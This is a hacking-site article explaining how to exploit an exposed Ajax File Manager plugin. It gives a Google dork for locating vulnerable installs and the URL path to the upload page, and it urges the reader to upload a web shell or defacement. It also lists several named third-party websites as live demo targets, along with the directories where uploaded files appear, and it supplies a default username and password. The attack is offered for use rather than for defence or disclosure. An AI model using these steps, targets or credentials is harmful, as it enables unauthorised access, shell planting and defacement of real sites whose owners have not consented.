Main » Articles » Web Hacking » Exploits and Vulenrablities

Ajax File Manager ~ Shell and Files Upload Vulnerability
Open Google Search Engine, Type this Dork :inurl:/plugins/ajaxfilemanager/

For Example I got : 
OR
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 

For example : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now Find Upload Upload and Upload Your shell/Deface/file


To view you File find /Uploaded/ directory in Website by using your brain :P


Example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


If you need Login in any Ajax File Manager 

Default Password Ajax File Manager

Username:ajax
Password:123456
Category: Exploits and Vulenrablities | Added by: max_hacker (12.07.09)
Views: 997 | Rating: 4.3/3
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2024
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz